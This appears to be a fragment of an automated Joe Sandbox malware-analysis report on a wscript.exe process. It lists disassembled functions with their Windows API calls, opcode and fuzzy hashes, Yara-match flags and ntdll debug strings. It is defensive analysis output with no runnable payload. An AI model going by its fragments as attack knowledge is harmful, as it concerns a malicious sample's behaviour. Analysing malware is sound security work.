                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 136c2d28a9003a151dfa448838f4435fcaafd81f63dcc1b5095b99542e64e32e
                                                                                                                                                      • Instruction ID: 5518cfb6b43d2718a1de35b14b628cd1ffe01736859dabba9ae240770345ad30
                                                                                                                                                      • Opcode Fuzzy Hash: 136c2d28a9003a151dfa448838f4435fcaafd81f63dcc1b5095b99542e64e32e
                                                                                                                                                      • Instruction Fuzzy Hash: 5E90023160600802F5907558451474600098BD0389F51C419A1065654DC769DA5576A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52B80, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 291602a7c7f229cd1f989591b462962222061a1e43df4efbf9a4476c3191cd76
                                                                                                                                                      • Instruction ID: 14a73328c9dc73fdcc97e960704ebf7efaec05a28a343460bf4b28b85edf11e2
                                                                                                                                                      • Opcode Fuzzy Hash: 291602a7c7f229cd1f989591b462962222061a1e43df4efbf9a4476c3191cd76
                                                                                                                                                      • Instruction Fuzzy Hash: 8890023120200842F54075584504B4600098BE0389F51C41EA1165654DC629D8517522
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52B90, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 7d26a2dabe7a72acc7ad0ccb5f90fc74242a03362b74c183f2a13fae65fcadf6
                                                                                                                                                      • Instruction ID: a27a347922db88036646c06d6a3c81f1a529e45644655155a107dec835c8bd97
                                                                                                                                                      • Opcode Fuzzy Hash: 7d26a2dabe7a72acc7ad0ccb5f90fc74242a03362b74c183f2a13fae65fcadf6
                                                                                                                                                      • Instruction Fuzzy Hash: 7490023120208802F5507558850474A00098BD0389F55C819A5465658DC6A9D8917122
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52BC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 7be0272d328c8ac607f63b73147b775d54a4e6d5f92ef5067a7cf0a14408c8ba
                                                                                                                                                      • Instruction ID: 7a8d26c040bfb15af65e79076e3a9a93770a3d646fedf6071e998c2fd3d2a03a
                                                                                                                                                      • Opcode Fuzzy Hash: 7be0272d328c8ac607f63b73147b775d54a4e6d5f92ef5067a7cf0a14408c8ba
                                                                                                                                                      • Instruction Fuzzy Hash: 1990023120200402F5407998550864600098BE0389F51D419A6065555EC679D8917132
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52B00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 4b1d947604e759adcf662ae1b47b85c7e48c7b81462db57ad5cf9a909b4245f4
                                                                                                                                                      • Instruction ID: d46e48a439d3b9e3749e718a29feac51fa83f377f1871300a519a6aecde1eeb0
                                                                                                                                                      • Opcode Fuzzy Hash: 4b1d947604e759adcf662ae1b47b85c7e48c7b81462db57ad5cf9a909b4245f4
                                                                                                                                                      • Instruction Fuzzy Hash: CD90023120604842F58075584504A4600198BD038DF51C419A10A5694DD639DD55B662
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52B10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 2dd3ae23f032cbbc51b4b41a768675b46c07baf3ec68904027b6f70f1af5ab30
                                                                                                                                                      • Instruction ID: f1b18739407b3e9e8770e003a5054441db02d714c6cb031b74ad863905ac5f54
                                                                                                                                                      • Opcode Fuzzy Hash: 2dd3ae23f032cbbc51b4b41a768675b46c07baf3ec68904027b6f70f1af5ab30
                                                                                                                                                      • Instruction Fuzzy Hash: F890023120200802F5C07558450464A00098BD1389F91C41DA1066654DCA29DA5977A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A534E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 862e537759f82347f2ab969d05e586f3b2033e4591c7477d5aebcc62d9f31ec0
                                                                                                                                                      • Instruction ID: 2d9768cfb7cd1462ca9bd0972ed84498e3beec753fc36bbe131b8a85c77e2009
                                                                                                                                                      • Opcode Fuzzy Hash: 862e537759f82347f2ab969d05e586f3b2033e4591c7477d5aebcc62d9f31ec0
                                                                                                                                                      • Instruction Fuzzy Hash: 0390023160610402F5407558461470610098BD0289F61C819A1465568DC7A9D95175A3
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007388E2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 428 7388e2-738906 429 73890c-738921 RtlFreeHeap 428->429 430 738907 call 7391e0 428->430 430->429
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00723B93), ref: 0073891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      • Opcode ID: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
                                                                                                                                                      • Instruction ID: ac589be6c12336909f707078eede8f01f0a63c526a8a214a6475653bec277ded
                                                                                                                                                      • Opcode Fuzzy Hash: ac1790c454beff9ea0d608bf1134bd1a52768fcd95365797c4fcb64701a2fe7d
                                                                                                                                                      • Instruction Fuzzy Hash: B4F065B1600218ABDB14DF68DC49ED737A8EF84750F114598FD4857241C671E914CBA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007388F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 434 7388f0-738921 call 7391e0 RtlFreeHeap
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00723B93), ref: 0073891D
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                      • String ID: .z`
                                                                                                                                                      • API String ID: 3298025750-1441809116
                                                                                                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                      • Instruction ID: 3af620012aa6b244cc4c714a6bd8cb967211d035e90b9970da49f8231554114c
                                                                                                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                      • Instruction Fuzzy Hash: FEE046B1200208ABDB18EF99CC49EA777ACEF88750F018558FE086B242C630F910CAF0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 007388B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 431 7388b0-7388e1 call 7391e0 RtlAllocateHeap
                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(65s,?,00733CAF,00733CAF,?,00733536,?,?,?,?,?,00000000,00000000,?), ref: 007388DD
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID: 65s
                                                                                                                                                      • API String ID: 1279760036-3030032896
                                                                                                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                      • Instruction ID: b65360def0905e2e9ebc122b9f8baf27e86d1782e6a4014dab6e344e90b36093
                                                                                                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                      • Instruction Fuzzy Hash: 9EE046B1200208ABDB14EF99CC45EA777ACEF88750F118558FE086B242C630F910CBF0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00738A50, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0072CFC2,0072CFC2,?,00000000,?,?), ref: 00738A80
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                      • Instruction ID: 7d1021a2a9901fbb405f854ffc4f0194c1b884c62fa770a982d99af516a178ee
                                                                                                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                      • Instruction Fuzzy Hash: 06E01AB1600208ABDB10DF49CC85EE737ADAF88650F018154FA0867242C934E910CBF5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0072D430, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00727C83,?), ref: 0072D45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                                                                                                      • Instruction ID: 92af3df3e40dd1e47c32560d8b69cd0c10f8a2854b29766e014f194aff729736
                                                                                                                                                      • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                                                                                                                      • Instruction Fuzzy Hash: 33D05E617903042AF620BAA49C07F2632885B55B40F494064FA48962C3D968E9008161
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0072D42F, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00727C83,?), ref: 0072D45B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30154231684.0000000000720000.00000040.00020000.sdmp, Offset: 00720000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_720000_wscript.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorMode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                                      • Opcode ID: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
                                                                                                                                                      • Instruction ID: 7a88f95f451cb817b3ed79c2059910a0801088da04bb380b5fc5ce75aa196871
                                                                                                                                                      • Opcode Fuzzy Hash: 72ea501ca32a20037376517925c6f4de5f815541c480a40789b399fa1f4469b1
                                                                                                                                                      • Instruction Fuzzy Hash: 60D05E717802043AFB20FAB49C07F6A27845F66740F094068F949E72C3D968D5018620
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A52B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 5b8527d40c59fb49cecd7e6f88972863210b632be70c25987cb67b4354da08ed
                                                                                                                                                      • Instruction ID: a81bf394947ec2cb056149fc59241278e462b3406bb52c2bc22cf15615fd6d11
                                                                                                                                                      • Opcode Fuzzy Hash: 5b8527d40c59fb49cecd7e6f88972863210b632be70c25987cb67b4354da08ed
                                                                                                                                                      • Instruction Fuzzy Hash: 34B09B729024C5C5FB51EF6057087177904ABE0745F16C455D2470641E473CD091F576
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 04A47550, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04A84460
                                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04A84530
                                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04A84507
                                                                                                                                                      • Execute=1, xrefs: 04A8451E
                                                                                                                                                      • ExecuteOptions, xrefs: 04A844AB
                                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 04A84592
                                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04A8454D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                                      • Opcode ID: a8e4fafb1a7a47dc422e4f5e20d218a318f2a985a98b47dada434bd19d3a3bb3
                                                                                                                                                      • Instruction ID: aa334bd96ec4bb4f0c1a77c557e009816de5ac63ef7d474dd472b8951ef4f222
                                                                                                                                                      • Opcode Fuzzy Hash: a8e4fafb1a7a47dc422e4f5e20d218a318f2a985a98b47dada434bd19d3a3bb3
                                                                                                                                                      • Instruction Fuzzy Hash: CC512835A00259AAEF10EF94DD85FAE73A9EFDC304F0404A9E505AB181EB70BE418F61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 04A19046, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001D.00000002.30163629230.00000000049E0000.00000040.00000001.sdmp, Offset: 049E0000, based on PE: true
                                                                                                                                                      • Associated: 0000001D.00000002.30165670715.0000000004B09000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001D.00000002.30165732579.0000000004B0D000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_29_2_49e0000_wscript.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $$@
                                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                                      • Opcode ID: f475bc64f56671513d47943f4af142248ec2419de5763928ea00671ad562fd54
                                                                                                                                                      • Instruction ID: 2eb48ed84f1632f9b7c42dc04d63210b3638d8365e26899fc9fdd6f760ed48c8
                                                                                                                                                      • Opcode Fuzzy Hash: f475bc64f56671513d47943f4af142248ec2419de5763928ea00671ad562fd54
                                                                                                                                                      • Instruction Fuzzy Hash: 3F812EB2D002699BDB35CF54CD44BEEB7B8AB08714F0041EAE919B7250E770AE84DF61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%